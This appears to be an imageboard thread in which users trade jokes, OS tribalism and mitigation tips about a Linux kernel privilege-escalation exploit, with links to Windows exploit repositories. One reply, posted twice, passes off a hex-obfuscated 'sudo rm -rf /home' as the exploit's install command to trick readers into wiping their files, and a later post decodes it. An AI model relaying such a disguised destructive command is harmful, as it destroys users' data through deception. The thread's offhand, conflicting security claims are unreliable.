Linuxbros I don't feel so good...
>Winslop 11 propaganda
How do I cope that my favorite OS has been outed as a complete fraud on security?
Yeah im going back to windows
>>108774802the difference is the in winblows you have to trust microslop to patch vulnerabilities and in chad linux you know when the patch is released and you can trust the patch to actually work because linux is open source and transparent unlike microslop winblows. microslop winblows will never win
>>108774723>A script that must be run locally>Literal nothingburgermany such cases
>>108774723they say it works on "openSUSE Tumbleweed: 7.0.2-1-default" but it don't, I tried it rn
Gentoo wins again
Does this require physical access to the computer or could someone do this remotely?
>>108774723Worst week for Linux in years. Anyway:> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distributionThen why the FUCK have they already released the exploit? Couldn't they wait for major distros to release a patch?
>>108774865>Does this require physical accessYes, and you need to have enabled that obscure kernel module nobody uses first, which is done by sudo enable module ***, then this glorious vibecoded hack will work
>A second CVE has hit the Penguin towers.
Don't forget that the transition to Wayland broke a lot of previously battle hardened GUI code and the rewrite in rust movement disturbed a lot of settled code. Even now PiP still dosen't work on Wayland and Firefox on mobile is still broken.
>>108774865It needs to execute arbitrary code somehow. This can be done remotely. If you got user level access you can gain root.
GET OFF YOUR JET AND FIX YOUR KERNEL YOU STUPID MOTHERFUCKER!
Kernel level privilege separation has fallen. Millions must endure the Qube.
>>108774833kernel.unprivileged_userns_clone=0 prevents it, unless you're on ubuntu or load an obscure kernel module most distros don't even ship.
>>108774833Me too.>Unknown command: ./dirtyfrag-expManjaro remains undefeated.
>iOS and Android are extremely secure>desktop operating systems are dogshitI hate this timeline.
>>108774723arch doesn't seem vulnerable, at least i don't see those modules in the zen kernel
>>108774879from what ive read some kernel dev released it by mistake
>>108775055i believe android is like qubes, in that it compartmentalizes literally everything
>>108775183no wonder it runs like shit
>>108775055Desktops are as secure as the web browsers. Most useful apps on Android and iOS are just glorified web pages anyway, so in practice security isn't that much different.That said one way Android and iOS are infinitely more secure than desktops is that they encrypt their data by default. People are hating on Microsoft for enabling bitlocker by default on their new computers however I found several computers and SSDs in the trash that have their sensitive data completely unencrypted. I could seriously ruin the lives of some people because they didn't know they shouldn't just throw their computers in the trash without wiping their hard drives first, or at least having bitlocker enabled.
>>108774723>if you let me run a program on your computer I hacked you bro!lol
>>108774829>wordswordswordsSounds like a whole bunch of Linuxtard cope to me. :^)
>>108775317>can't parse more than 2 sentencesbased retard
>>108774964thisembrace the QUBEonly in the QUBE may you be secure
>>108775014based retard
>>108775014LOLyou are either retarded or a 10/10 baiter
>>108774879>Then why the FUCK have they already released the exploit? Couldn't they wait for major distros to release a patch?How would you know for sure that you're safe if they didn't release the exploit?
>>108774723really conspicuous that these latest exploits don't affect android or chromeOS
not seen type your name and user_id at install screen in long time
>>108775939They don't affect any Linux unless you have a certain module installed. Android and ChromeOS just don't have that module, as is the case with most Linux distributions.Be cool if they did though.
>>108774723It’s over. Wiped all my Btrfs drives clean. Starting fresh with a strategic deployment of ReFS and tried and true NTFS. Purchased a copy of Windows Server 2025 and an Windows 11 Enterprise license. I have also acquired a Microsoft 365 Premium subscription with Copilot. I feel like an idiot for wasting my time on Fedora and RHEL.
>>108775055>>desktop operating systemsthat's just loonix. machadOS and WONdows do not have these problems despite having 100000x more users each
>>108776631>machadOS and WONdows do not have these problemslol
>local exploitEvery OS out there is riddled with these.
>>108776653cite 1 (one) in recent years>inb4 an article describing an exploit chain discovered by a state actor or israeli security firm that due to its complexity has been against select individuals and costs something in the ballpark of hundreds of millions on the black marketmeanwhile on troonix>lol just send a message with 'poop' repeated a bunch of times so you trigger a buffer overflow in the dilated service which runs as root
>>108776677https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768https://windowsreport.com/cisa-warns-of-windows-privilege-escalation-flaw-affecting-windows-11-and-server-2025/https://github.com/mbanyamer/CVE-2025-24076https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64669
>>108774887The exploit loads the module without sudo.You can block it by disabling user namespaces but then your dockers will suck
>>108774723absolute nothing burger
>>108774833He's running a script he wrote called dirtyfrag-expThe script obviously contains the instructions for the exploit to be executed. You "can't run it" because it's not an inbuilt command in the Linux OS.
jokes on you I don't even connect my computer to the internet
>>108774723kek, notice that all of these are happening within a month on shadow-drops that have had no announcement or time to prepare? This is on purpose, Microsoft and the others are trying to kill Linux for good.
>>108774829In Linux the microsecond it's released, it's already in the wild. MS pays bug bounties to keep this under wraps until it's patched.
>>108774879>Then why the FUCK have they already released the exploit?Microsoft psyopMicrosoft psyop
I wish the penguin cult would take these things more seriously. Saying, “nothing burger” doesn’t make things any better, it just makes the community look retarded.
>>108776871>>108776869almost every researcher follows the 90-30 rule, it's just that on troonix there's the lack of coordination between the thousands of troons running the hundreds of distros and the morons doing kernel dev, as well as complete lack of care for the end user.no researcher is obligated to wait indefinitely for every single toy distro to roll out a patch or for every dumb maintainer asking "use case for security?" to get their shit together
>>108774896kek
>>108776774What is the downside of disabling the modules listed on the write-up? esp4, esp6, and rxrpc?
>>108774836shut up jeff
>>108775939They all affected kernel modules nobody uses that (((for some reason))) are compiled into the kernel (all RHEL derivatives).
>>108774723Daily reminder that if it's free as in freedom YOU are the product.
>>108777018Nothing unless you are for some reason using linux as a IPsec VPN router or AFS.
So does this rely on rxrpc module being loaded? Cause I'm on debian and I can't see it loaded..
>>108776836Thank you, Captain Obvious, but problem is really on my side. I can't read - I'm already on linux 7.0.3 and it don't work on that
>>108777053(NTA but they mentioned that apparmor probably stops it from working in the write-up just FYI)
>>108776836>sudo apt install dirtyfrag-exp>Error: Unable to locate package dirtyfrag-expHow do I enable hacker repo?
Okay, now how are they getting the script onto my system, and then getting access to the system to run it?It's not Windows where I get infected with rogue scripts just by looking at a website wrong.
>>108777085per the report it'ssudo apt add -c "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
sudo apt add -c "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>108777132>sudo apt add -c "rm -rf /home"Oh no! Another local Linux vulnerability 0-day! Linux is so insecure, Madaidan needs to update her blog!
If you care about secure computing, Linux is no longer a serious contender.
>>108775278>download some code from github or if another open source project gets MITM'd>./configure && make && make install>it silently executes the exploit >it installs keyloggers, rootkits, bootkits (most freetards don't even have secure boot enabled), steals your passwords etc etc etc
>>108777499running a random script you don't trust mean you already failed the linux security model you don't have to be super user to get the interesting bits. Yes that includes reading password from memory or just upload the chrome and firefox profile. Its that easy if you have access.
>>108774723Nothingburger. lsmod doesn't even show esp4, esp6 and rxrpc as loaded for me. The modules are present though. I've added a .conf file with omit_drivers+=" esp4 esp6 rxrpc " so the modules will be removed on the next kernel installation.
>>108774723no one uses shared environments, the only way root access in general will affect anyone is if you're back in the 90s and someone wants to mess with the schools systems
>>108774723>Exploit doesn't work on FreeBSDgreat at all
>>108776631Lel, lnao, even
>>108774723>another """vulnerability""" that has lots of prerequisites and needs local access to do anythingIs all security discourse going to be used for propaganda now? Fucking wintoddlers and fucking shills.
>need to have physical access
Man it really is astroturf week, microjeet must be desperate
>>108777499Yeah probs best to have your LLM of choice read it first and tell you what it does.
>>108777117There are more computers in the world than yours.
>>108775317based retardnow post your hand and ID
>>108774723>obongo>redhat>redhat>redhat>another redhat>redhatDoes it affect any other distros?
>>108777768no no you dont need physical access retardas if supply chain attacks aren't a thing
>>108774723>no archbtw
>another LPE nothingburger>modules that any competent gentoo user doesn't even have
>>108774723WOWZERS?If someone on my puter has local access he can HECKING DO THAT just run a script like that?Bros Im pogging rn...Next time you will tell me a hacker can type sudo rm -rf /* in my terminal???
Oh no. I have to immediately patch. Oh, wait, I'm the only user on my systems.
>>108776759>no responseWrecked. I don't know why people comment on this sort of thing when they seemingly know absolutely nothing about it. Why was he so confidently wrong? The knowledge he lacked was just a search away.
>>108776903Everyone on every OS has basically accepted that the user -> root barrier is not a barrier they can rely on. Everyone puts their barriers somewhere more sensible.This is like bombing no man's land. It's already fucked out there, for everyone.
>>108778166It does feel very forced. All the attempts at bigging up local exploits on here. Normally I don't believe that companies take the time to shlil on this shithole, but I think in this case retards have listened to shills on other sites, so the message is filtering into here as well.It just relies on people not understanding basic realities of computing, so most of /g/ is vulnerable.
>>108780181there's definitely corporate shilling here.
>>108774723>rootis that all? you still need access to the computer network
anyways, will this be useful to root android phones?
arch won again? unbelievable
>>108777761To get local execution you just need a decent web browser exploit and chain that.
>>108776871Didn't legit exploits get released because the person in question wasn't getting paid out. These companies are jewish af.
>>108774723notice how freechads don't give a fuck. we aint getting hacked even with vulns
>>108780150>Why was he so confidently wrong? The knowledge he lacked was just a search away.Retards love to spout out garbage, then disappear when they get BTFO'ed.At least all these recent vulnerabilities in Linux are getting fixed for good. Meanwhile in proprietaryland, Windows doesn't have the world probing its source code for vulns and consequently the nation-state zero days are gonna be around for a long time.
>>108782074because no one cares enough to analyze the bsd source.
What is the root account is disabled and you only use sudo?
>>108774723....and now its patched.thats what open source is all about.
>>108774829You've never audited an update before installing it. Who are you trying to kid?
>>108782120Root account always exists.
>>108774723what the fuck!imagine all the undisclosed stuff NSA has at its disposal